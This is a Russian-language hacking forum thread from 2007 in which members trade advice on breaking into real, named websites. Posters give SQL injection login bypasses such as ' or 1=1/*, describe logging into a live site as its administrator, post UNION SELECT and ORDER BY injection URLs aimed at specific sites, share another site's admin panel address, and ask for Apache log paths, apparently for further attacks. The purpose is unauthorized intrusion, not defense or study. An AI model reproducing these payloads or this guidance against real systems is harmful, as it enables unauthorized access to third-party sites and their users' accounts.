Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Player1

    Player1 New Member

    Joined:
    18 Dec 2007
    Messages:
    13
    Likes Received:
    0
    Reputations:
    0
    как я понял там юзаеться mod_rewrite
     
  2. darky

    darky ♠ ♦ ♣ ♥

    Joined:
    18 May 2006
    Messages:
    1,773
    Likes Received:
    825
    Reputations:
    1,418
    единственный способ - гугл, если он проиндексировал раньше чем поставили "переписанные ссылки", либо тупо угадать :)
     
  3. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    Да, но в идеале в этом фрейме может же оказаться содержимое нужных/интересных/ файлов?

    С таким же успехом ты можешь просто обратится к ним, например site.ru/.htaccess, вместо site.ru/script.asp?file=.htaccess
    Знаешь какой результат будет? =) Вот и у ифрейма тоже самое

    159932, там mod_rewrite или в штацессе прописано что то типа
    add-type application/x-httpd-php .html
     
  4. Player1

    Player1 New Member

    Joined:
    18 Dec 2007
    Messages:
    13
    Likes Received:
    0
    Reputations:
    0
    поможет если только сайт не поливался сразу с переписаными ссылкамми :)
     
  5. Ershik

    Ershik Elder - Старейшина

    Joined:
    7 Nov 2007
    Messages:
    301
    Likes Received:
    46
    Reputations:
    6
    У меня такой вопрос.
    http://www.halbot.ru
    Странная форма авторизации.
    Я могу авторизоваться по типу: ' or 1=1/* : 1 Сразу появляется левая анкета, я ее не регистрировал.
    Так, вот попробовал авторизоваться под админом:
    "admin" : 'or 1=1/*
    admin'/* : 1
    admin'/* : or 1=1/*
    Ковырял минут пять но эффекта не добился. В чем я могу ошибаться?
     
  6. AFoST

    AFoST Elder - Старейшина

    Joined:
    28 May 2007
    Messages:
    588
    Likes Received:
    485
    Reputations:
    176
    попробуй так
    Code:
    1' or login like %admin% /*
    Т.е. заходить будет в том случает если логин содержит последовательность символов admin (admin123 SITEadmin RadminR)
    За место login может быть что-нибудь другое. Например пароль или мыло или аська....
     
  7. Ershik

    Ershik Elder - Старейшина

    Joined:
    7 Nov 2007
    Messages:
    301
    Likes Received:
    46
    Reputations:
    6
    В логине может быть максимум 12 знаков
    Пробовал 1' or admin' : 1 не получилось.
    Ни кавычки ничего он не съедает, а лишь тупо их пропускает.
     
  8. Ershik

    Ershik Elder - Старейшина

    Joined:
    7 Nov 2007
    Messages:
    301
    Likes Received:
    46
    Reputations:
    6
    Я еще подумал, что это ловушка админа ..а нет. пропускает на любой пароль но ' or 1=1/* должен быть обязателен.

    Эээ..разобрался! :D
    Собственно так. Аккаунта admin там нет.
    Но порывшись в комментах и выдернув первый попавшиеся логин я спокойно авторизовался по нему. :rolleyes:
     
    #528 Ershik, 19 Dec 2007
    Last edited: 19 Dec 2007
  9. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    на ловушку легко можно проверить подставиви например ' or 999=999/*
     
  10. AFoST

    AFoST Elder - Старейшина

    Joined:
    28 May 2007
    Messages:
    588
    Likes Received:
    485
    Reputations:
    176
    Ну вот, пользуйся на здоровье :) А админа все же найди!
     
  11. Ershik

    Ershik Elder - Старейшина

    Joined:
    7 Nov 2007
    Messages:
    301
    Likes Received:
    46
    Reputations:
    6
    Гхм. Нашел.
    Админ - halbot
    Авторизовался как halbot : 'or 1=1/*
    А как ' or 999=999/* Не получилось.
    Самое интересное, что когда авторизуюсь под левым ником никакая информация не выскакивает. Один емейл тип zz@zz и все.
    Акк админа то есть, но входа в админку там нет.
     
  12. ~EviL~

    ~EviL~ Elder - Старейшина

    Joined:
    14 Aug 2007
    Messages:
    169
    Likes Received:
    77
    Reputations:
    4
    Не могу раскрутить =\ :
    HTML:
    Database error with query: [SELECT s1.id as parent_id, s1.title as parent_title FROM sections as s LEFT JOIN sections as s1 on s.parent_id=s1.id WHERE s.id=]: error 1064:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1
    
    Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /home/sinaius2/public_html/evreimir/article.php on line 41
    (http://www.evreimir.com/article.php?id=-12032&res=1)

    Кроме этого:

    HTML:
    http://www.rudtp.ru/articles.php?id=44+ORDER+BY+7/*
    Все норм, а так:
    HTML:
    http://www.rudtp.ru/articles.php?id=44+UNION+SELECT+1,2,3,4,5,6,7/*
    Ошибка. Почему? :confused:
     
    #532 ~EviL~, 21 Dec 2007
    Last edited: 21 Dec 2007
  13. BlackCats

    BlackCats Elder - Старейшина

    Joined:
    1 Feb 2006
    Messages:
    642
    Likes Received:
    630
    Reputations:
    -3
    http://www.tymoshchuk.com/priv/index.php
    в админке ни чего интересного..
    PS
    задефейсиш - запинаю.
     
    2 people like this.
  14. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    у меня вобще не загружается
    http://www.rudtp.ru/articles.php?id=44+and+substring(version(),1,1)=3

    в третьей ветке не предусмотрено использование конструкции union select
     
  15. AFoST

    AFoST Elder - Старейшина

    Joined:
    28 May 2007
    Messages:
    588
    Likes Received:
    485
    Reputations:
    176
    Подскажите, пожалуйста, пути к логам апача. Где сохраняются параметры refferer, user-agent и др... Чем больше вариантов тем лучше.
     
  16. Ershik

    Ershik Elder - Старейшина

    Joined:
    7 Nov 2007
    Messages:
    301
    Likes Received:
    46
    Reputations:
    6
    AFoST /logs/access.log
     
    1 person likes this.
  17. 4Dfx

    4Dfx Banned

    Joined:
    6 Dec 2007
    Messages:
    12
    Likes Received:
    10
    Reputations:
    0
    Вот возможные пути.
     
    1 person likes this.
  18. DEMIX

    DEMIX Elder - Старейшина

    Joined:
    17 Jun 2007
    Messages:
    42
    Likes Received:
    5
    Reputations:
    0
    Искал на сайте уязвимость и вот что мне выдало:

    Code:
    Query: 'SELECT id,id2 FROM forum,player WHERE id=1_id AND id_1=9 ORDER BY is_announce DESC, last_reply_time DESC LIMIT -2570, 10' failed...

    Что-то не та ошыбка которая должна быть. Здесь есть уязвимость или нет??? Если да то почему я немогу подобрать таблицу.
     
  19. Dr.Z3r0

    Dr.Z3r0 Leaders of the World

    Joined:
    6 Jul 2007
    Messages:
    284
    Likes Received:
    595
    Reputations:
    567
    Ну если я правильно понял то "-2570"- какой то третий параметр который ты можешь изменять...
    Уязвимость есть, но что либо сделать путного ты не сможешь к сожлению так как перед этим стоит order by...
     
    #539 Dr.Z3r0, 24 Dec 2007
    Last edited: 31 May 2011
  20. DEMIX

    DEMIX Elder - Старейшина

    Joined:
    17 Jun 2007
    Messages:
    42
    Likes Received:
    5
    Reputations:
    0
    А как можно обойти??
     
    #540 DEMIX, 24 Dec 2007
    Last edited by a moderator: 31 May 2011
Thread Status:
Not open for further replies.